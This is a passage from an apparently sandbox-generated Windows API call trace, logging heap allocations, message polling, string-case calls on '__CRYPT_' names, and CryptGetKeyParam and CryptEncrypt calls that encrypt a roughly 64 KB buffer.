hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0192.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0192.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0192.012] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0192.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0192.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0192.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.013] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0192.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0192.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0192.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0192.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0192.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0192.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0192.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0192.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0192.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0192.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0192.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0192.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0192.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0192.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0192.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0192.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0192.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0192.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0192.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0192.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0192.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0192.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0192.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0192.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0192.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0192.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0192.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0192.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0192.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0192.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0192.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0192.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0192.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0192.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0192.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0192.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0192.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0192.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0192.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0192.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0192.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0192.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0192.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0192.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0192.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0192.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0192.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0192.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0192.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0192.019] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2678, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2678*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0192.020] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.020] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.020] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.020] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.020] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.020] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.020] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.020] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.020] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.020] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.020] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.020] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.020] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.020] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.020] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.020] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.020] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.020] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.021] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.021] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.021] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.021] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xfcbc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xfcc0) returned 1 [0192.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.021] CharLowerBuffW (in: lpsz="byte[64705]", cchLength=0xb | out: lpsz="byte[64705]") returned 0xb [0192.022] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.022] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.022] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.022] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.022] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6ecd0*, pdwDataLen=0x87e820*=0xfcbc, dwBufLen=0xfcc0 | out: pbData=0xa6ecd0*, pdwDataLen=0x87e820*=0xfcc0) returned 1 [0192.023] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.023] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.023] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.023] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.023] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.023] PeekMessageW (in: 